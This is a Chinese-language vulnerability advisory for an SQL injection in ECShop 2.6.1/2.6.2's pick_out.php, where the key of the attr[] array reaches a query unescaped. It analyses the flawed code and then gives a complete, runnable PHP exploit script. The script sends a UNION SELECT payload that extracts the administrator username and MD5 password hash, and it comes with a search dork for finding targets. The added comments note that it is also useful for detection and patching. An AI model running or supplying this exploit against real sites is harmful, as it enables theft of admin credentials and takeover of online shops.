ECSHOP 2.6.1/2.6.2
SSV-ID: 11412
SSV-Appdir: ECSHOP
发布时间: 2009-05-25
影响版本:
漏洞描述:
文件includes/init.php判断get_magic_quotes_gpc(),如果为off则调用addslashes_deep():

// includes/init.php
if (!get_magic_quotes_gpc())
{
    if (!empty($_GET))
    {
        $_GET = addslashes_deep($_GET);
    }
    if (!empty($_POST))
    {
        $_POST = addslashes_deep($_POST);
    }

    $_COOKIE = addslashes_deep($_COOKIE);
    $_REQUEST = addslashes_deep($_REQUEST);
}

addslashes_deep()在文件includes/lib_base.php里最后通过addslashes()处理:

// includes/lib_base.php
function addslashes_deep($value)
{
    if (empty($value))
    {
        return $value;
    }
    else
    {
        return is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);
        // 只处理了数组的值:)
    }
}

下面看下具体的导致漏洞的代码,文件 pick_out.php里:

// pick_out.php
if (!empty($_GET['attr']))
{
    foreach($_GET['attr'] as $key => $value)
    {
        $key = intval($key);
        $_GET['attr'][$key] = htmlspecialchars($value);
        // foreach处理的是指定数组的拷贝,所以这里的处理并不影响数组原先的key和value
        // 因此可以引入任意的key:)
        // 程序员的逻辑出了问题?
    }
}
...
foreach ($_GET['attr'] AS $key => $value)
{
    $attr_url .= '&attr[' . $key . ']=' . $value;

    $attr_picks[] = $key;
    if ($i > 0)
    {
        if (empty($goods_result))
        {
            break;
        }
        // 利用key进行注射:)
        $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attrvalue='$value'");

由于magic_quotes_gpc=off时没有对$key处理,同时在数组赋值时存在逻辑问题(intval()后的$key只用于写入一个新元素,原先的字符串key仍保留在数组中),最终导致了注射漏洞.
<*参考
ryat#wolvez.org*>
http://www.80vul.com
测试方法:
#!/usr/bin/php
<?php
// This program is for technical exchange only; do not use it for illegal purposes!!
//
// Proof-of-concept for the pick_out.php SQL injection described in the advisory
// above (ECShop 2.6.1/2.6.2, magic_quotes_gpc = Off). The injection point is the
// KEY of the attr[] query-string array, which pick_out.php concatenates into a
// query without escaping (its sanitising loop only intval()s a copy of the key).
// Defensive notes: the request is a single plain GET to pick_out.php whose
// attr[...] key carries SQL keywords, which is straightforward to match in
// web-server logs or a WAF rule; the fix is to cast/escape the key itself before
// it reaches the query.
print_r('
+---------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------+
');
/**
 * works with magic_quotes_gpc = Off
 */
// CLI usage check: argv[1] is the host, argv[2] the web path of the ECShop install.
if ($argc < 3) {
    print_r('
+---------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------+
');
    exit;
}

error_reporting(7);               // E_ERROR | E_WARNING | E_PARSE only
ini_set('max_execution_time', 0); // no execution time limit for the CLI run

$host = $argv[1];
$path = $argv[2];

// One raw HTTP request; the response is then scanned for a "IN (name:md5)"
// fragment. That fragment comes from the second pick_out.php query, whose
// IN (...) clause is built by implode()-ing the first query's result — whether
// it is visible in the response depends on ECShop's error display (inferred,
// not checked by this script).
$resp = send();
preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);

// preg_match leaves $hash as an empty array when nothing matched, so the
// else branch is the "no match" case.
if ($hash)
    exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
    exit("Exploit Failed!\n");

/**
 * Sends the single crafted GET request and returns the raw HTTP response
 * (status line, headers and body) as one string.
 *
 * Reads $host and $path from globals; port 80 is hard-coded, so HTTPS-only
 * hosts are not supported. NOTE(review): fsockopen()'s return value is never
 * checked — on a connection failure $fp is false, fputs() emits a warning,
 * the read loop is skipped, and an empty string is returned, which the
 * caller reports as "Exploit Failed!".
 */
function send()
{
    global $host, $path;

    // URL-encoded query string; the injection is carried in the attr[] key
    // (%27 = ', %20 = space, %2c = ',', %3d = '=', %23 = '#').
    $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';

    // Hand-built HTTP/1.1 request; "Connection: Close" makes the server end
    // the connection after the response so the feof() loop below terminates.
    $data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: Close\r\n\r\n";

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    // Accumulate the whole response in 1 KiB reads until the server closes.
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>